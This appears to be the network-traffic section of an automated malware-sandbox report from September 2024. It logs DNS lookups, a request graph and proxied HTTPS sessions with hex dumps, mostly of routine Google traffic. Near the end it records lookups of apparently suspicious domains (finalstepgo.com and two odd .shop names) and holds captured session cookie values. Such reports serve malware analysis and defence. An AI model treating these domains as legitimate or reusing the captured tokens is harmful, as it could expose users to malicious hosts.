Sep 26, 2024 17:55:21.609457016 CEST	1.1.1.1	192.168.2.16	0x13f5	No error (0)	google.com			65	IN (0x0001)	false
Sep 26, 2024 17:55:21.618886948 CEST	1.1.1.1	192.168.2.16	0x492	No error (0)	google.com			65	IN (0x0001)	false
Sep 26, 2024 17:55:21.618925095 CEST	1.1.1.1	192.168.2.16	0x7666	No error (0)	google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:22.607296944 CEST	1.1.1.1	192.168.2.16	0x2162	No error (0)	www.google.com		172.217.16.132	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:22.608437061 CEST	1.1.1.1	192.168.2.16	0x3025	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 26, 2024 17:55:24.660310030 CEST	1.1.1.1	192.168.2.16	0xb8aa	No error (0)	csp.withgoogle.com		142.250.184.241	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:25.149383068 CEST	1.1.1.1	192.168.2.16	0x2c04	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 26, 2024 17:55:25.149827003 CEST	1.1.1.1	192.168.2.16	0xd9fb	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:26.091483116 CEST	1.1.1.1	192.168.2.16	0xcde9	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:26.091483116 CEST	1.1.1.1	192.168.2.16	0xcde9	No error (0)	www3.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:26.092715979 CEST	1.1.1.1	192.168.2.16	0x6376	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:26.096992970 CEST	1.1.1.1	192.168.2.16	0x1a6f	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:26.096992970 CEST	1.1.1.1	192.168.2.16	0x1a6f	No error (0)	plus.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:26.097938061 CEST	1.1.1.1	192.168.2.16	0x92c1	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:27.088371992 CEST	1.1.1.1	192.168.2.16	0xd90d	No error (0)	play.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:27.466183901 CEST	1.1.1.1	192.168.2.16	0x277b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:27.466245890 CEST	1.1.1.1	192.168.2.16	0x4990	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:55:27.466245890 CEST	1.1.1.1	192.168.2.16	0x4990	No error (0)	plus.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:28.144754887 CEST	1.1.1.1	192.168.2.16	0xccb2	No error (0)	play.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:41.851546049 CEST	1.1.1.1	192.168.2.16	0x14b2	No error (0)	finalstepgo.com		185.255.122.133	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:56.636248112 CEST	1.1.1.1	192.168.2.16	0xa7f8	Name error (3)	candleduseiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:56.658983946 CEST	1.1.1.1	192.168.2.16	0x1671	No error (0)	racedsuitreow.shop		172.67.206.221	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:55:56.658983946 CEST	1.1.1.1	192.168.2.16	0x1671	No error (0)	racedsuitreow.shop		104.21.37.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

google.com

www.google.com

https:

csp.withgoogle.com

apis.google.com

ogs.google.com

www.bing.com

r.bing.com

browser.pipe.aria.microsoft.com

fp.msedge.net

p-ring.msedge.net

play.google.com

slscr.update.microsoft.com

fs.microsoft.com

finalstepgo.com

racedsuitreow.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49706	142.250.181.238	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:22 UTC	653	OUT	GET / HTTP/1.1 Host: google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:55:22 UTC	854	IN	HTTP/1.1 301 Moved Permanently Location: https://www.google.com/ Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-tKENS3MQHB-yZx72OJyJHg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:22 GMT Expires: Sat, 26 Oct 2024 15:55:22 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 220 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:22 UTC	220	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49707	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:23 UTC	657	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:55:23 UTC	1764	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:55:23 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dVFPWq-nlQ1-HVWUPIK3lQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; expires=Tue, 25-Mar-2025 15:55:23 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; expires=Fri, 28-Mar-2025 15:55:23 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:55:23 UTC	1764	IN	Data Raw: 32 35 35 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e Data Ascii: 2558<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>
2024-09-26 15:55:23 UTC	1764	IN	Data Raw: 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 62 3b 72 65 74 75 72 6e 20 74 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 3d 66 Data Ascii: ,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x\|\|(d.x=f
2024-09-26 15:55:23 UTC	1764	IN	Data Raw: 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2c 61 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 6e 73 2c 74 3d 72 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 72 73 2c 76 Data Ascii: "navigationStart"in window.performance.timing,aa=google.stvsc&&google.stvsc.ns,t=r?aa\|\|window.performance.timing.navigationStart:void 0;function u(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=google.stvsc&&google.stvsc.rs,v
2024-09-26 15:55:23 UTC	1764	IN	Data Raw: 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 64 7c 7c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 3b 76 61 72 20 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 69 73 2e 6a 3d 21 21 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 65 66 65 72 72 65 64 22 29 3b 76 61 72 20 64 3b 69 66 28 64 3d 21 74 68 69 73 2e 6a 29 61 3a 7b 66 6f 72 28 64 3d 30 3b 64 3c 44 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 61 2e 67 65 74 41 74 74 72 69 62 Data Ascii: veEventListener(b,c,d\|\|!1):a.attachEvent&&a.detachEvent("on"+b,c)};var pa=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");this.j=!!this.g.getAttribute("data-deferred");var d;if(d=!this.j)a:{for(d=0;d<D.length;++d)if(a.getAttrib
2024-09-26 15:55:23 UTC	1764	IN	Data Raw: 3d 30 2c 64 3d 62 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 49 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 47 28 49 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d Data Ascii: =0,d=b.length;c<d;++c)a(I(b[c]))};function ra(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();G(I(a,void 0,!0,!0),b)}}function K(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}}
2024-09-26 15:55:23 UTC	748	IN	Data Raw: 6e 67 65 22 2c 51 2c 21 30 29 3b 50 28 30 29 3b 78 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 72 61 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6c 6f 61 64 22 2c 4b 2c 21 30 29 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 65 72 72 6f 72 22 2c 4b 2c 21 30 29 29 3b 67 6f 6f 67 6c 65 2e 63 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 21 61 7c 7c 21 62 26 26 64 61 28 61 29 29 72 65 74 75 72 6e 20 30 3b 69 66 28 21 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 Data Ascii: nge",Q,!0);P(0);x&&(google.c.oil=ra,B(document.documentElement,"load",K,!0),B(document.documentElement,"error",K,!0));google.cv=function(a,b,c,d){if(!a\|\|!b&&da(a))return 0;if(!a.getBoundingClientRect)return 1;var e=function(h){return h.getBoundingClientRe
2024-09-26 15:55:23 UTC	208	IN	Data Raw: 63 61 0d 0a 20 61 66 74 73 20 63 62 73 20 63 62 74 20 66 68 74 20 66 72 74 73 20 66 72 76 74 20 68 63 74 20 68 73 74 20 70 72 74 20 70 72 73 20 73 63 74 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 75 6e 63 74 69 6f 6e 20 54 28 61 29 7b 72 65 74 75 72 6e 28 61 3d 74 61 2e 73 65 61 72 63 68 2e 6d 61 74 63 68 28 6e 65 77 20 52 65 67 45 78 70 28 22 5b 3f 26 5d 22 2b 61 2b 22 3d 28 5c 5c 64 2b 29 22 29 29 29 3f 4e 75 6d 62 65 72 28 61 5b 31 5d 29 3a 2d 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 55 28 61 29 7b 76 61 72 20 62 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 63 3d 62 2e 6d 3b 69 66 28 21 63 7c 7c 21 0d 0a Data Ascii: ca afts cbs cbt fht frts frvt hct hst prt prs sct".split(" ");function T(a){return(a=ta.search.match(new RegExp("[?&]"+a+"=(\\d+)")))?Number(a[1]):-1}function U(a){var b=google.timers.load,c=b.m;if(!c\|\|!
2024-09-26 15:55:23 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 63 2e 70 72 73 29 7b 63 3d 77 69 6e 64 6f 77 2e 5f 63 73 63 3d 3d 3d 22 61 67 73 61 22 26 26 77 69 6e 64 6f 77 2e 5f 63 73 68 69 64 3b 76 61 72 20 64 3d 53 28 29 7c 7c 63 3f 30 3a 54 28 22 71 73 75 62 74 73 22 29 3b 64 3e 30 26 26 28 63 3d 54 28 22 66 62 74 73 22 29 2c 63 3e 30 26 26 28 62 2e 74 2e 73 74 61 72 74 3d 4d 61 74 68 2e 6d 61 78 28 64 2c 63 29 29 29 3b 76 61 72 20 65 3d 62 2e 74 2c 68 3d 65 2e 73 74 61 72 74 3b 63 3d 7b 7d 3b 62 2e 77 73 72 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2e 77 73 72 74 3d 62 2e 77 73 72 74 29 3b 69 66 28 68 29 66 6f 72 28 76 61 72 20 6b 3d 30 2c 6d 3b 6d 3d 75 61 5b 6b 2b 2b 5d 3b 29 7b 76 61 72 20 6e 3d 65 5b 6d 5d 3b 6e 26 26 28 63 5b 6d 5d 3d 4d 61 74 68 2e 6d 61 78 28 6e 2d 68 2c 30 29 29 7d 64 Data Ascii: 8000c.prs){c=window._csc==="agsa"&&window._cshid;var d=S()\|\|c?0:T("qsubts");d>0&&(c=T("fbts"),c>0&&(b.t.start=Math.max(d,c)));var e=b.t,h=e.start;c={};b.wsrt!==void 0&&(c.wsrt=b.wsrt);if(h)for(var k=0,m;m=ua[k++];){var n=e[m];n&&(c[m]=Math.max(n-h,0))}d
2024-09-26 15:55:23 UTC	1390	IN	Data Raw: 3b 66 21 3d 3d 6c 26 26 28 6e 3d 66 2c 67 3d 71 29 3b 66 3d 6c 3b 2b 2b 6d 3b 64 28 29 7d 76 61 72 20 68 3d 21 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 30 2c 66 3d 30 2c 67 3b 4a 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 61 28 6c 29 26 26 28 2b 2b 6b 2c 6c 2e 69 7c 7c 6c 2e 41 3f 65 28 6c 2e 69 7c 7c 30 2c 6c 2e 67 29 3a 6c 2e 76 2e 70 75 73 68 28 65 29 29 7d 29 3b 62 28 29 3b 68 3d 21 31 3b 64 28 29 7d 3b 76 61 72 20 57 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 66 75 6e 63 74 69 6f 6e 20 79 61 28 29 7b 69 66 28 67 6f 6f 67 6c 65 2e 63 2e 63 34 74 26 26 57 26 26 57 2e 6d 61 72 6b 26 26 57 2e 74 69 6d 69 6e 67 29 7b 76 61 72 20 61 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 62 3d 61 2e 77 73 72 74 3b 61 3d 61 2e 74 2e 61 66 74 3b Data Ascii: ;f!==l&&(n=f,g=q);f=l;++m;d()}var h=!0,k=0,m=0,n=0,f=0,g;J(function(l){a(l)&&(++k,l.i\|\|l.A?e(l.i\|\|0,l.g):l.v.push(e))});b();h=!1;d()};var W=window.performance;function ya(){if(google.c.c4t&&W&&W.mark&&W.timing){var a=google.timers.load,b=a.wsrt;a=a.t.aft;
2024-09-26 15:55:23 UTC	1390	IN	Data Raw: 67 6c 65 2e 63 2e 77 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 3b 67 6f 6f 67 6c 65 2e 63 2e 62 28 22 70 72 74 22 29 3b 76 61 72 20 44 61 3d 66 61 7c 7c 30 3b 69 66 28 44 61 3e 30 29 61 3a 7b 69 66 28 74 21 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 45 61 3d 75 28 29 2c 46 61 3d 44 61 2d 45 61 3b 69 66 28 46 61 3e 30 29 7b 5a 3d 73 65 74 54 69 6d 65 6f 75 74 28 56 2c 46 61 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 45 61 29 29 3b 62 72 65 61 6b 20 61 7d 56 28 29 7d 5a 3d 76 6f 69 64 20 30 7d 67 6f 6f 67 6c 65 2e 63 2e 6d 61 66 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 7c 7c 4a 28 Data Ascii: gle.c.wh=Math.floor(window.innerHeight\|\|document.documentElement.clientHeight);google.c.b("prt");var Da=fa\|\|0;if(Da>0)a:{if(t!==void 0){var Ea=u(),Fa=Da-Ea;if(Fa>0){Z=setTimeout(V,Fa,Math.floor(t+Ea));break a}V()}Z=void 0}google.c.maft=function(a,b){x\|\|J(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.16	49710	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:24 UTC	1744	OUT	GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:24 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 4232 Date: Thu, 26 Sep 2024 15:55:24 GMT Expires: Fri, 26 Sep 2025 15:55:24 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
